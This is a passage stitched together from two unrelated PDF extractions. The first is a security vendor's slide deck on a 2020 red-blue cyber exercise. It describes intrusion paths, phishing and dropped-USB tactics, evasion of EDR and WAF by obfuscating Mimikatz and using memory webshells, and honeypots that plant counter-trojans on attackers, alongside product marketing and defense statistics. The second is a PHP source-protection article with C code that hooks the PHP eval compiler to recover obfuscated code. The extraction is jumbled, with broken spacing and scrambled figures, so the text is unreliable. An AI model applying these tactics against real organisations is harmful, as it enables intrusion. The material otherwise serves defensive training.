储,经测试和目标数据库系统账号(密码)一致,导致目标系统被攻陷。 1. 发现真实攻击的能力; 2. 应对真实攻击的能力。 防护 人员 流程 技术 体系 组织 制度 措施 验证体系变化的影响 通过攻防实战的形式,验证点、线、面的安全性,实实在在地提升安全对抗能力。 护 网 的 起 源 和 演 变 — 2020攻 防 演 练 变 化 • 防守方发现种类由8种变成3种; • 溯源得分需要在攻击成功之后。 类 别 • 防守报告上限 50 次; 报 告 • 总结报告得分减少由2000分变为1000分; • 不提交总结报告扣1000分。 • 增加沙盘推演、DDOS攻击; • 优化各个细节更贴近实战环节。 流 程 优秀攻击队 攻击联队 重要行业代表 防守方 沙盘推演: 护网最优秀的攻击队组成联合攻击队对重要行业攻击情 况展开沙盘推演,每个行业代表现场需要进行两轮沙盘推演: 过程包含了方案推演、方案置辩、补充建议等。防守方在正 式开始时才会得到攻击联队的攻击方案,需要现场制定防守 方案、应对措施,陈述对应的防守方案。 参演单位出席嘉宾包含了行业相关院士专家、公安部相 关领导、直属行业部委级领导、相关行业同业嘉宾等。 规则 沙盘推演 未知攻,焉知防 —说说攻击队的那些 事 PART 2 长 亭 红 队 简 介  突破边界 20+;  批量获取服务器权限100台以上 15+;  拿下靶标/控制核心生产系统/获取核 心业务数据 10+;  预备0Day:30+;  定制化工具:10+;  获评“军火商”级别(TOP 2)。 Target 爱好者级别 以网络攻防为业余爱好 民兵级别 利用1Day和nDay打击目标 APT级别 利用漏洞渗透,埋伏,移动,获得 权限,拿下目标 核武器/军火商级别 使用大量0Day攻击 0 1 0 2 0 3 0 4 长亭攻防演习2020成绩单 长亭科技-对抗能力储备 • 各种 VPN 0day • Coremail 邮箱 0day • VMWare ESXi 虚拟机逃逸 • SQLite 击溃全线浏览器(含移动) • 帆软、致远、泛微 OA 等 RCE • Firefox/Safari 远程代码执行 • 思科防火墙远程代码执行 • gitlab/bitbucket 远程代码执行 • Windows/macOS/Android 本地提权 • 即时通信软件远程代码执行 • 等等... 攻防演练案例分析-常见攻击路径 1. 外网 – DMZ服务器 – 核心区服务器 – 核心网 2. 外网 – DMZ服务器 – 运维管理/监控agent – 管理端 – 重要服务器 3. 外网 – DMZ服务器 – 安全设备agent – 管理端 – 重要服务器 4. 外网 – DMZ服务器 – 域控 – 多网卡机器 – 堡垒机 – 核心网服务器 5. 外网 – DMZ服务器 – 虚拟机逃逸 – 云管理平台 – 重要系统 6. 外网 – 内网终端 – 域控 – 开发/运维终端 – 堡垒机 – 核心网服务器 7. 外网 – 内网终端 – OA/SSO等服务器 – 运维终端 – 重要系统 8. VPN – 域认证信息 – 邮箱系统 – 翻取网络拓扑/账号密码 – 重要系统 9. 外网 – 第三方内网 – 第三方专网 – 目标核心网 Round 1: 1. 利用VPN 0Day 拿下VPN服 务器权限 ,并建立内网代 理;通过db文件获取内网资 产表; 2. 拿下某服务器作为持久化据 点; 3. 同时发现VPN可直通核心, 直击重要系统时被防守方察 觉,防守方采取应急措施进 行封禁,VPN入口丢失。 防守应急 补丁更新 下线特权账号 关闭/替换VPN 攻 防 演 习 案 例 — 上 帝 视 角 Round 2: 1. 在持久化机器被发现 前火速进攻,从该机 器发现HIDS agent; 2. 通过agent攻破HIDS 服务端; 3. 利用服务端向agent端 下发命令控制重要服 务器,最终通过迂回 的方式,成功控制重 要系统。 攻 防 演 习 案 例 — 上 帝 视 角 Round 1: 通过搜集邮箱账号,进行第一轮广撒网式钓鱼,由于发送数量较多,被防守方发现并进行了内部邮件 通报,第一次钓鱼攻击失败; 攻 防 演 习 案 例 — 另 辟 蹊 径 ( 社 会 工 程 学 ) Round 2: 以 “警惕钓鱼邮件”为主题伪造钓鱼邮件,针对少量特定用户进行第二轮定向钓鱼,成功拿下一名员工PC 权限; 以此为入口,先攻破OA服务器,然后在OA首页进行挂马钓鱼,钓鱼成功后打入运维人员PC机翻阅敏感 文件,从而控制堡垒机,进而夺取重要系统; 攻 防 演 习 案 例 — 另 辟 蹊 径 ( 社 会 工 程 学 ) 攻 击 技 战 法 — 攻 击 流 程 与 核 心 要 素 剖 析 初始信息收集 初始入侵 站稳脚跟 提升权限 内部信息收集 完成目标 横向移动 维持权限 攻击流程 核心要素 1 . 信 息 是APT攻击的第一生产力,贯穿APT攻击的整个生命周期,优秀的情报能力可以令攻击 事半功倍; 2 . 漏 洞 是撕开防线的武器,需要依靠信息精确制导; 3 . 工 具 主要包括远控,日志、流量、密码窃取等后渗透工具。 攻 击 技 战 法 — 动 态 对 抗 , 从 信 息 持 续 追 踪 开 始攻防的信息搜集: 01 02 03 04 提前搜集200+ 可能参演单位 的资产, IP、 域名、人员信 息等; 对资产进行跟 踪, 针对临时 新增资产, 辅 助进行蜜罐识 别; 识别资产指纹 ( cms 、 第 三 方系统、组件 中间件等), 以便进行漏洞 利用; 围绕特定人员 搜集信息, 以 供社工钓鱼; 05 理解业务, 了 解并选择潜在 的攻击路径。 攻 击 技 战 法 — 信 息 为 王 , 突 破 办 公 系 统 提前储备相关0Day或 1day,可供外网突破或 内网深入; 突破成功后,查找账号密码、 跳板机、网络拓扑、重要系 统位置等敏感信息; 也可结合用来进行内网 社 工钓鱼。 OA/邮箱: 攻 击 技 战 法 — 攻 陷 VPN, 打 开 ” 上 帝 视 角 “ VPN: 攻 击 技 战 法 — 打 破 隔 离 , 直 上 云 端 虚拟机内部逃逸 管理平台 虚拟化: 攻 击 技 战 法 — 擒 “ 贼 ” 先 擒 “ 王 ” , “ 擒 拿 ” 特 权 系 统 安 全 设 备 不 安 全 。 安全/运维/监控设备:  提前储备相关0Day或1day,可供内 网 横 纵 向 扩 展 利 用 ;  一般以server端 控 agent端 ,或者先从agent打到server,再打其他agent的形 式;  攻 击 技 战 法 — 摸 排 供 应 链 , 实 施 精 准 打 击 供应链上的系统漏洞:  针对特定行业,常用特定软件或者系统进行一定储备和了解;  面对临时发现的第三方系统,可采取寻找源码,现场审计挖0Day的方式攻击。 攻 击 技 战 法 — 欺 骗 的 艺 术 社工钓鱼:  针对人员信息,发送特定主题的钓鱼邮件,如补丁 更新、投诉举报、简历投递、安全演习通告等;  伪装成电信人员进入对方机房检查网络,将笔记本 通过网线接入内网直接开始渗透;  进入目标单位办公区,趁保安不注意向无人值守的 办公电脑植入远控木马;  往目标单位附近投放大量U盘,U盘上带有单位 logo 诱骗员工拾取并插入办公电脑。  …… 攻 击 技 战 法 — 工 欲 善 其 事 , 必 先 利 其 器  扫描器,进行全面信 息搜集及资产跟踪;  一键化漏洞利用工具, 简化打点、突破流程, 节约时间。 外网  自动化信息搜集脚本;  常见漏洞利用/提权/持 久化的一键化脚本或 工具。 内网  通用工具+定制化插件, 重点漏洞exp;  预备免杀木马与对抗 性脚本payload。 远控与免杀 攻 击 技 战 法 — 对 抗 防 守 , 躲 避 检 测 , “ 形 人 而 我 无 形 ”  基 于 规 则 的 WAF可使用语 法 和协 议 变 形 等技巧绕 过 ;  优先使用无 文 件 的 内 存 马 进 行 控 制 , 绕 过 HIDS/EDR检 测 ;  使 用 加 密 信 道 传 输 数 据 和 控 制 权 , 使 用 端 口 复 用 技 术 藏 匿 流 量 ;  切 忌 内 网 大 规 模 扫 描 , 特 别 是 对 4 4 5 、 3 3 8 9、22这些敏感端口,优先 利用企业资 料、网络连接信息、历史登录信息进行横向扩展;  对工具进行代 码 混 淆 ,并做免 杀 处 理 (CS、 Mimikatz等);  入 侵 系 统 后 , 将 通 过 漏 洞 利 用 对 系 统 进 行 控 制 的 方 式 , 转 为 常 规 运 维 访 问 (如ssh登录,或使用运维平台下发命令),以 维 持 权 限 。 攻 击 技 战 法 — 总 结 外部信息收集 内部信息收集 初始入侵 维持权限 VPN 邮箱 OA 运维管理系统、信息类业务系统 常用框架 基础组件 虚拟化平台 域控 本机历史记录 网络连接信息 隐藏隧道免杀技术 安全检测绕过技术 分(子)公司 业务系统 供应链 攻 击 技 战 法 —攻 防 技 战 法 的 演 进 :2019 vs 2020 攻 防 两 端 博 弈 , 平 均 能 力 提 升 明 显 。 2019 2020 攻击队 防守队 攻击队 防守队 应对手段粗暴 关停 应对手段更针对性 精准发现攻击能力 溯源反制能力 nDay漏洞利用 漏洞储备丰富 自研工具特征隐蔽 开源工具特征明显 漏洞储备较少 开源工具特征明显 内网渗透手法粗糙 封禁IP 真实攻击发现能力较弱 尚未具备反击能力 通用组件 网络 安全 攻击战术多元化 内网渗透手法细腻 网络隔离 分析取证 关停 封禁IP 隐蔽隧道 绕过安全检测 实战出真知 —长亭2020防守纪 实 PART 3 长 亭 产 品 服 务 体 系 雷池(SafeLine)下一代 Web 应用防火墙 采用前沿的人工智能语义分析算法,能够基于上下文逻辑 实现攻击检测,提升准确率,降低误报率。 谛听(D-Sensor)伪装欺骗系统 利用欺骗伪装技术,解决内网防护难以察觉、难以明确、 难以追溯三大问题,赋予内网全新的主动对抗能力。 洞鉴(X-Ray)安全评估系统 集资产管理、Web 扫描与主机扫描为一体,帮助企业全面 封堵因漏洞带来的安全风险。 牧云(CloudWalker)主机安全管理平台 基于 Agent 的深度服务器工作负载安全平台,帮助企业提 升资产能见度并有效防御入侵。 安全服务体系 • 咨询(等保咨询、安全攻防能⼒成熟度评估) • 建设(HW专项主防、红蓝对抗) • 检测(渗透测试、基线检测、代码审计) • 应急(应急响应) • 保姆式服务包(全年),包含⽇常、专项、应急、 重⼤保障等服务。 雷池 精准识别,拦截来自 Web的大量攻击 一定的0day防御能力, 后端快速响应 即插即用,业务无影 Web攻击防护难点 强大的解码能力 智能语义分析 无需维护规则库 开放API &日志外发 雷池防护效果 全面/灵活的部署模式 变种攻击多样,载荷隐蔽, 难以发现 高级攻击手法使用率高, 甚至0day攻击频发 传统WAF规则调优难度 大、耗时久,效果难达预 期 系统封闭,难以融入自动 化处置体系 ! " # $ % & ' ( ) * + , - ' . / 0 响迅速开启实战拦截 完美嵌入安全体系, 实现自动化封禁 适配多种网络架构, 各行业实践丰富 长亭WAF核心能力  真实攻击场景:  外⺴部署溯源蜜罐,在攻击者资产搜集阶段 获 取其真实信息,溯源攻击者,上报威胁;  赋予内⺴⾼密度的威胁感知与欺骗伪装能⼒, 让进⼊内⺴的⾼级攻击团队步⼊迷宫、⽆所 遁 形;  溯源站点数量达33种,业界最多;  ⽀持蜜罐定制化需求,需根据实际情况核算。  部署便捷:⾮侵⼊式架构,⽀持实体机、虚拟机、 云 主机,迅速覆盖重要区域  部署位置:在不同安全域部署监测节点,可通过各 节 点对未分配使⽤ IP 地址进⾏全⾯覆盖 长亭蜜罐核心能力 以攻击视角评估安全风 险 洞鉴-解决之道 洞鉴(X-Ray)以攻击者视角评估用户系统的安全风险, 依托自有安全团队的实战经验,采用识别+验证的方式, 精准发现漏洞风险,并为用户提供资产漏洞生命周期管 理功能。 04 03 02 01 详细记录漏洞信息、影响范围 和处理建议,通知用户及时修 复 根据资产特征匹配漏洞PoC, 验证漏洞是否存在 通过端口扫描和爬虫获取详细 的资产信息 通过主动扫描和被动分析模式, 收集IP、域名/URL资产信息 信息收集 扫描查点 攻击提权 清理痕迹 定位 辅助用户内网安全风险评 估的专业工具 精准发现高危漏洞 详细提供处置方法 追踪漏洞生命周期 完美嵌入安全体系  牧云极强的反入侵能力帮助防守方第一时间 感 知主机层面威胁  多种入侵行为感知  网络攻击链检测  攻击队入侵到主机我们能 发 现么?  利用跳板还可发动更多攻击!  如何获取至关重要的服务 器 内部安全监测视角?  形成完备的现网主机风险画 像 风险事件聚合关联 建立主机风险画像 主机安全的统一管理 Web后门 检测 反弹Shell 识别 后门程序 感知 敏感文件 修改 异常进程 异常登录 暴力破解 WebShell 恶意文件 敏感文件 权限异常 异常命令 长亭牧云主机管理系统核心能力 防 守 整 体 数 据 — 防 守 工 作 其中,91家单位选择了长亭科技的专家 值守服务。所有服务项中,安全设备占比42%, 专家值守占比35%,专家值守占所有安全服务 60%,为长亭科技此次演习主要服务内容, 长亭科技共为8家单位提供了主防值守工作。 攻防演练人员工作项 支持单位数量 单位数量占比 安全调研 8 5.7% 资产梳理 11 7.9% 安全体检 15 10.7% 策略布防 14 10.0% 攻防演练 14 10.0% 专家值守 91 65.0% 安全设备 112 80% 安全调研 资产梳理 3% 4% 安全体检 6% 策略布防 5% 攻防演练 5% 专家值守 安全设备 安全调研 资产梳理 安全体检 策略布防 攻防演练 专家值守 安全设备 工作内容 此次攻防演习,长亭科技投入全体安全 服务人员参与演习行动,为140家单位提供防 守工作支持。 长亭科技主要提供了安全防护产品服务 以及安全调研、资产梳理、安全体检、策略布 防、攻防演练、专家值守六项安全服务。助防 服务覆盖备战、防守各个阶段。 现场值守 防 守 整 体 数 据 — 防 守 工 作 与 人 员 投 入  24小时专人驻场服务;  安全日志分析与事件处置;  综合研判与溯源分析;  处置报告编写。 专家值守 二线支持  威胁情报;  高级专家研判支持;  溯源支持; 攻防演习人员投入情况 人员投入情况(人) 人/天 工作模式 防守现场 主防 71 2651 7*24 协防 262 4810 7*24 7*12 合计 333 7461 二线支持 10 1120 7*24 7*12 总计 343 8581 攻防演习期间,专家值守工作分设 防守现场、二线协防双层保障机制,保 证防守效果。 值守工作人员投入  所有值守工作共投入343 人, 使用 8581人天;  主防值守投入人员占比21%,人天占 比31%; 防 守 整 体 数 据 — 长 亭 产 品 数 据 攻防演习期间。共有115家单位部署以上长亭科技安全产 品。其中以蜜罐和WAF产品最多。 部署单位涉及金融、能源、基建、交通等多领域,其中金 融、能源、通信、政府单位占较大比例,共达90%左右。 产 品 投 入 分 布 此次攻防演习,长亭科技安全产品投入如下: 雷池(SafeLine)下一代Web应用防火墙 谛听(D-Sensor)伪装欺骗系统 洞鉴(X-Ray)安全评估系统 牧云(CloudWalker)主机安全管理平台 全流量(TrafficAnalysis)流量分析预警系统 87 14 9,6.4% 8 0 20 40 60 80 100 雷池 洞鉴 蜜罐 牧云 全流量 长亭产品部署单位数量 120 112 金 融 能 源 21% 通 信 14% 政 府 14% 演习期间—长亭产品部署行业分 布 基建 金融 通信 制造业 互联网 交通 能源 政府 物流 军队军工 设备部署软硬件超过400台套; 默认防护:37个; 添加策略:50个; 设备部署软硬件149套; 谛听告警总计1000w+; 溯源信息数量2000余 条(捕获到IP或 账号信息); 防 守 整 体 数 据 — 长 亭 产 品 数 据 产 品 运 行 情 况 单日处理请求总数:120亿 次; 攻击发现次数:1.7亿 次; 漏报率:<0.73%,误报率<0.87%; 0Day:120个。 溯源成功的人数 500余 人(通过IP或账号信息确认真实身份); 溯源成功命中了攻击队10%(定位到攻击队成员并提供攻击证明,上 报得分); 反制成功命中了攻击队2%(反控攻击队PC并得分)。 弱口令:SSH、MySQL、Redis。20000+,生产 环境 4000+ 应用漏洞:shiro、fastjson、Jackson 等1000+ WebSHELL:100+ 反弹SHELL:10+ 恶意命令执行:200+ 攻防演习期间总共部署探针约 20000 点; 弱口令: SSH、MySQL、Tomcat、FTP 等3000+ 高危系统漏洞:100+ 应用漏洞:WebLogic:60+:心脏滴血:100+;Shiro: 30+、Fastjson:400+ WebSHELL:40+ 恶意命令:30+ 87家 9家 112家 某 银 行 某 金 融 单 位 防 守 整 体 数 据 — 攻 防 演 习 二 线 协 防 情 况 溯源情况分布 59, 20% 溯源成功 溯源失败 237, 80% 协 防 支 持 流 程 0 500 1000 1500 9.11 9.12 9.13 9.14 9.15 9.16 9.17 9.18 9.19 9.2 9.21 9.22 9.23 9.24 协 防 支 持 成 果 • 积极响应多种溯源请求 攻防演习期间二线共收到溯源请求296条,其中文件请求13条,IP 溯源请求达189条。 • 精准溯源,及时共享 成功溯源237条,成功率达80%。并及时分享数据、响应同源请求。 • 多方采集,汇集情报 累计采集到可疑IP 1814条,支撑一线防护策略部署。 • 有效溯源工作,支撑多次防守和反制 溯源成功加分案例3个,其中两个为钓鱼邮件,一个为VPN反制。 溯源反制案例达10+个。 可疑IP数量分布 • 防守现场协防接口人:负责协防支持对接; • 防守现场情报接口人:负责情报上报工作; 由协防数据可知,二线协防工作对前场防守起到了 非 常重要的支持作用。 十 大 防 护 技 战 法 —1. 攻 防 能 力 评 估 与 建 设 规 划 长 亭 主 防 服 务 体 系 十 大 防 护 技 战 法 —2. 高 度 重 视 , 全 员 参 与 人是护网项目最核心的要素! 团队之间不团结,推卸责任。 存 在 问 题 : 解 决 方 案 : 1 高层不重视,事情推不动; 1 高层领导重视是前提条件; 2 跨部门协调流程多,效率低; 2 跨部门团结合作是必备条件; 组建临时项目组,覆盖测试、开发、应用、运维 多个部门领导与技术人员,提前2个月开始准备; 3 3 全员动员,提高整体的安全意识。 4 十 大 防 护 技 战 法 —3. 资 产 梳 理 &资 产 定 位 洞 鉴 ( X-Ray ) 具备主 机 服 务 、综 合 Web 探 测 和被 动 探 测 引 擎 , 提 供 主 机 系 统 、 Web应 用 和域 名 的 多维度资产信息发现功能,完成 以攻助防中资产的全面检测,且 可以对 接 内 部 的 资 产 管 理 软 件 CMDB; 一切从资产开始! 牧 云 (CloudWalker)主机安全管理平台通过部署在主机上的 agent 对 资产信息进行全面采集,可 发 现 主 机 、 数 据 库 、 Web资 产 、 应 用 、 进 程 (进程名、进程路径、PID、用户等)、容 器 (Docker镜像和 Docker容器)等多种类型资产,全 面 掌 握 系 统 版 本 信 息 、 网 络 接 口 、 软 件 应 用 类 型 等 内 容 ,再通过外部数据源同步,建立包含设备 属性、时间属性、空间属性、责任人属性等详尽的资 产 指 纹 信 息 ,让企 业管理者拥有一张全面的、清晰的、详尽的资 产 图 谱 ,满足多种资产管理 场景; 人 工 方 式 ,从开 始 到结束,不 间 断 盘 点 、 跟 踪 、 核 查 与 确 认 ,如梳理防火墙 配 置 、 回 收老 旧 资 产 、 登记新上资产等。 存在问题: 1. “理 不 清 ” : 边 缘 资 产 、 老 旧 资 产 、 未 知 资 产 ; 2. “管 不 清 ”:管理边界不清晰,未统一管理,不同资产不同对接人, 开放端口管理不严格。 目标: 发 现 异 常 IP告 警 ,能够五 分 钟 内 ,定 位 到 该 IP对应的 资产在位置、具体到哪个机架、哪个办公桌。 实现手段: 1 2 3 十 大 防 护 技 战 法 — 4.攻 击 面 收 敛 &网 络 隔 离 A 评估准备 B 评估实施 评估加固 A • 网络拓扑图 • 防火墙ACL列表 • 资产列表 • 常见攻击路径图 B • 安全域划分 • 安全域隔离及访问控制措施 • 攻击面评估 • 入侵防护措施 C • 安全隔离 • 攻击面收敛 工作目标 通过网络架构评估,明确整体网络安全域划分、梳理域间/域内访问控制关系、评估攻击面及入侵防护情况,最终实现网络 隔离及攻击面收敛。 传统做法:停留在理论和要求阶段,缺乏有效的系统评估步骤、评估重点及验证手段。 长亭优势:基于HW实战经验及案例,明确评估重点及优先级,通过具体实施流程及方法,实现上述目标,并在实际主防项目中 取得良好的防护效果。 C 十 大 防 护 技 战 法 — 4.攻 击 面 收 敛 &网 络 隔 离 第三方机构 WiFi VPN 邮箱 外网IP、端口 外网应用系统 办公终端 运维终端 集权系统 靶标系统 分支机构 攻击面评估 老旧资产 访问控制及入侵防护评估  评估准备  网络拓扑:网络拓扑图,包括安全设备、网络设备、IP地址等信息。  资产表:详见资产梳理。  防火墙策略:防火墙上的ACL及NAT列表。  网络攻击路径:基于实战经验梳理的常见网络攻击路径,未知攻,焉知防。  评估实施  网络安全域划分:明确安全域划分原则及业务分布,其中靶标系统所在安全域、开发 测试区、互联网DMZ区、运维管理区、第三方外联及专线区、办公区等,需重点关注。  访问控制关系:明确域间及域内访问控制关系,同时,梳理防火墙访问控制列表及 NAT列表,绘制可视化访问关系及入侵防护图谱。  攻击面评估:根据资产表及常见攻击路径,梳理内、外网易受攻击资产,明确攻击面 风险。  入侵防护评估:根据网络拓扑及攻击面,梳理入侵防护现状及风险,包括安全措施和 安全设备覆盖度。  评估加固  网络隔离:通过发现的问题,基于权限、端口、服务、访问最小化原则,加强内外网 隔离、安全域间/域内隔离及收敛访问关系,并通过工具进行验证,如内外网端口扫描、 NAT列表定期审查。  攻击面收敛:资产迁移、老旧资产下线、定时开关、统一互联网出入口、增强防护措 施(双因素认证、安全设备部署、统一身份认证等)等 十 大 防 护 技 战 法 —5. 安 全 体 检 30000+ 2000+ 140+ 资产监控 风险识别 专项检查 推动整改 整改验证 十 大 防 护 技 战 法 —6. 安 全 意 识 提 升 、 钓 鱼 防 护 、 防 社 工 技 术 防 护 管 理 手 段 攻 击 者 视 角 防 御 者 视 角 社 会 钓 工 鱼 程 学 物 理 攻 击 安全邮件网关 上网行为管理 终端杀毒管理 WiFi二次认证 虚拟桌面管理 相关人员统一着装 内外网办公分离 邮件钓鱼 电话钓鱼 WiFi钓鱼 安全意 识提升 培训 员工绩 效考核 挂钩 安全意 识仿真 检测 安全意 识宣传 海报 Badusb攻击 移动WI-FI攻击 伪装内部人员获取敏感数 据 十 大 防 护 技 战 法 —7. 边 界 防 护 、 0Day防 护 边界防护是重中之重! 存在问题: 1 . 边 界 防 护 范 围 覆 盖 不 全 ,如没有统一的流量入口、加密 流量 监控不到; 2 . 防 护 维 度 不 够 , 如 没 有 应 用 层 的 监 控 ; 3 . 安 全 设 备 检 测 细 粒 度 不 够 ,海量告警数据,没有贴合 业务场景进行防护; 4 . 第 三 方 、 子 公 司 、 分 支 机 构 接 入 不 设 防 ; 5 . 高 风 险 、 重 点 资 产 防 护 不 到 位 ,如对外的VPN、邮件 系统等。 目标: 常 规 攻 击 无 法 突 破 边 界 防 护 , 0Day攻 击 第 一 时 间 发 现 。 实现方式: 重 点 资 产 重 点 布 防 , 实 现 二 次 认 证 、补 丁升级、流量监控、主机监控、严格网络隔 离;HW前 收 集 0Day情 报 , 设 置 针 对 性 安 全 策 略 ;护网期间,对接阿 里 情 报 库 联 动 。 将 “ 第 三 方 、 子 公 司 、 分 支 机 构 ” 视 为 不 可 信 实 体 , 对交互流量进行统一监 控; 安 全 规 则 优 化 , 消 除 误 报 , 贴 合业务; 安 全 设 备 部 署 , WAF、网页防篡改、邮 件网关、APT、HIDS、 EDR等;加密流量卸载; 入 口 收 敛 , 统 一 入口,将各个应用的 通过公有云做代理后, 再访问服务器; 1 2 3 4 5 VPN网关 防火墙 网 络 防 护 边 界 子 公 司 、 第 三 方 雷池(WAF) 谛听(蜜罐) 牧云(HIDS) 洞鉴(漏扫) 网页防篡改 业 务 区 EDR系统 态势感知 安 全 运 营 区 网络层 边界防护 全流量分析 应用层 边界防护 主机层 内部防护 抗DDoS IDS/IPS 邮件网关 系统 0Day 子公司 不设防 网络入口 不收敛 威胁情报 反弹Shell 持续日志监控耗费人力 不同设备告警存在差异性 单一告警的准确性存疑 无法通过分析排查风险IP 不同厂商设备联动性差 难以汇总上下级单位数据 监控人员能力参差不齐 需要全人工分析处置事件 十 大 防 护 技 战 法 —8. 自 动 化 运 营 核 心 运 营 痛 点 在攻防对抗中,防守方往往需要部署大量监控手段以应对各个方向的攻击。与此同时大量增加的安全设 备以及监控手段会带来额外的监控分析人力成本。通过传统的铺人战术并不能有效的将安全能力最大化,反而因 为协作中的问题带来更大的隐患。  接 入 日 志 : 将 可 靠 的 WAF、 webIDS、 邮 件 沙 箱 、 IPS、 全 流 量 、 HIDS、 EDR等安全设备日志和系统应用日志,接入部署的日志平台ELK、 splunk、 日 志 易 进行集中监测、分析;  策 略 制 定 : 优 化 接 入 设 备 的 告 警 准 确 性 , 针 对 性 加 入 监 控 规 则 , 如 : VPN登 录 失 败 、 SQL注 入 、 反 序 列 化 攻 击 、 登 录 失 败 事件;  自 动 封 禁 : 联 动 防 火 墙 、 CDN、 账 户 系 统 对异 常 IP、 账 户 进 行自动封禁; (需要确保防火墙部署情况 负载情况以及设备是否可以获取真实IP) 攻击者IP资源,可有效打击攻击者的积极性。 44 29 121 121 134 133 131 202 133 98 67 10 13 36 15 32 11 21 29 27 29 24 14 15 8 10 11 7 0 50 100 150 200 250 2020-09-11 2020-09-12 2020-09-13 2020-09-14 2020-09-15 2020-09-16 2020-09-17 2020-09-18 2020-09-19 2020-09-20 2020-09-21 2020-09-22 2020-09-23 2020-09-24 自动化体系构建 高效事件处置 某防守单位事件处置趋势变化 自动处置数量 人工处置事件工单  快 速 封 禁 :防火墙 5 秒 内快速完成封禁生效、CDN 2 分 钟 内完成封禁生效;  关 注 重 点 : 可 以 通 过 自 动 封 禁 将 无 意 义 的 互 联 网 扫 描 、 僵 尸 网 络等无需特别关注的事件进行自动处置,监控与处置人员可以 将注意力放在更为严重的事件中,避免攻击者使用大量IP资源 进行声东击西;  干 扰 攻 击 者 : 由 于 自 动 封 禁 可 以 快 速 响 应 封 禁 攻 击 者 I P,消 耗 十 大 防 护 技 战 法 —8. 自 动 化 运 营 准 演 客户 安全服务 产品研发/技术支持 备阶段 选择1-3个需要做成蜜罐的业 务系统 为每个系统提供2-4个域名和IP, 解析/绑定到真实业务系统上 准备部署所需资源。 设计伪装欺骗方案 制作和散布诱饵 设计和制作免杀木马 根据客户的需求和安服的设计制 作蜜罐 部署伪装欺骗环境,放置虚假数 据 练阶段 在演习开始后,切换域名/IP, 指向蜜罐 反制攻击者,提交报告 维护木马 调整策略 维护蜜罐 反制蜜罐培养策略 最终目标:混淆攻击者收集的目标信息,提高捕获攻击者的概率 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 反制解决方案:在提升溯源能 力的同时,增加了反制能力, 攻击反制成为HW的得分利器。 暴 露 吸 引 下载安 装 插入木马 VPN客户 端 文档 登 录 控 件 其他安 装 包 攻 击 者 蜜 罐 系 统 种植木马 反 制 上 线 反制服务器 安服专家 攻击反制 远程 监 控 收 集 信 息 真实系统 域名A 域名B 域名C 搜索引 擎 收 录 收 录 收 录 诱饵域名 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 某大型国企 在DMZ区、运维区、服务器区 部署高中低交互混合的蜜罐 攻击者A发起攻击, 安装VPN客户端 综合情报 提交报告 得分3000 攻击者B在运维区横 向移动 触碰探针 谛听及时告警 分析判断 快速处置 没有丢分 触发反制木马 触发溯源机制 远控攻击者主机 获取帐号信息 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 十 大 防 护 技 战 法 —10. 内 网 入 侵 检 测 在关键资 产部署牧 云探针 开启牧云 微蜜罐 定义监听 端口 接受网络 流量 牧云上报 蜜罐诱捕 事件 网络流量 转发至谛 听探针 攻击者踩 入高交互 蜜罐环境 实现全量 主机伪装 欺骗 牧云微蜜罐+谛听联动 虚 实 结 合 , 全 面 覆 盖 , 精 准 溯 源 , 让 攻 击 者 无 处 可 逃 Thanks
pdf
1 浅谈PHP源代码保护⽅案&受保护PHP代码の解 密还原 前⾔ PHP 加密⽅案分析 ⽆扩展⽅案 源代码混淆 ⼿⼯解密 ⾃动化通⽤解密 PHP扩展⽅案 源代码混淆 ⼿⼯解密 ⾃动化通⽤解密 opcode 还原代码 附录 PHP扩展编译 总结 参考 php是⼀种解释型脚本语⾔. 与编译型语⾔不同,php源代码不是直接翻译成机器语⾔.⽽是翻译成中间代码(OPCODE) ,再由解释器 (ZEND引擎)对中间代码进⾏解释运⾏ . 在php源代码的保护在原理可以分为3⼤类. 源代码混淆(编码) OPCODE混淆(编码) 修改解释引擎(虚拟机) 前⾔ ● ● ● 2 在部署上可以分为2⼤类. ⽆扩展 有扩展 下⾯分析下各种加密⽅案的实现⽅法 ⽆扩展的加密在⼀些⼩开发者⽐较常⻅。 这种源代码保护⽅式侵⼊性⼩,⽆需对服务器做额外的配置,兼容性较强。 这种情况混淆后的源代码还原⾮常简单,可完全还原出源代码。 有时连注释都会保留 (x 我觉得这种混 淆都不能称之为加密 基本流程 压缩代码->混淆变量函数类名->使⽤简单函数和⽅法进⾏编码加密 例:base64 异或 看到这种的php不要慌 这种处理后的⽂件 解密流程的变量和函数名使⽤了⼤量的⾮打印字符 按照正常 的流程就可以 ctrl+alt+l 快捷键 格式化代码 (这⾥使⽤的PhpStorm 其他IDE 格式化遇到特殊符号可能出问题 这⾥提前 调整好了⽂件编码) ● ● PHP 加密⽅案分析 ⽆扩展⽅案 源代码混淆 ⼿⼯解密 3 这⾥有⼀个php的特性 php中的base64遇到⾮base64表中字符会直接忽略 不会影响解码 注: PHP7 遇到空字符可能会抛出error 可以使⽤php5.6执⾏ (这⾥有⼀个兼容性问题 ) 遇到这种加密最简单的⽅法就是找⽂件中最后⼀步执⾏的函数 直接把内容打印出来 4 这种编码⽅法最后⼀步肯定要使⽤eval执⾏还原后的php代码 所以打印最后⼀个函数基本上php代码就 会全部出来 (x 前⾯操作⼀⼤顿毫⽆卵⽤ 注: 有保护⽅案也使⽤了call_user_func或call_user_func_array间接调⽤eval 成功还原源代码 <?php phpinfo();?> ⾃动化通⽤解密 5 PHP提供了强⼤的扩展功能 可以直接通过编写php扩展hook eval相关函数 获取执⾏的源代码 HOOK php zend引擎的 zend_compile_string zend_include_or_eval 函数达到⽬的 这⾥演示的是 hook zend_compile_string 函数 6 C 复制代码 /* $Id$ */ #include "php.h" #include "ext/standard/info.h" static zend_op_array* (*old_compile_string)(zval *source_string, char *filename TSRMLS_DC); static zend_op_array* evalhook_compile_string(zval *source_string, char *filename TSRMLS_DC) { if(strstr(filename, "eval()'d code")) { printf("\n------eval-------\n%s\n------eval------- \n",Z_STRVAL_P(source_string)); } return old_compile_string(source_string, filename TSRMLS_CC); } PHP_MINIT_FUNCTION(evalhook) { return SUCCESS; } PHP_MSHUTDOWN_FUNCTION(evalhook) { return SUCCESS; } PHP_RINIT_FUNCTION(evalhook) { old_compile_string = zend_compile_string; zend_compile_string = evalhook_compile_string; return SUCCESS; } PHP_RSHUTDOWN_FUNCTION(evalhook) { zend_compile_string = old_compile_string; return SUCCESS; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 7 成功还原源代码 PHP扩展⽅案 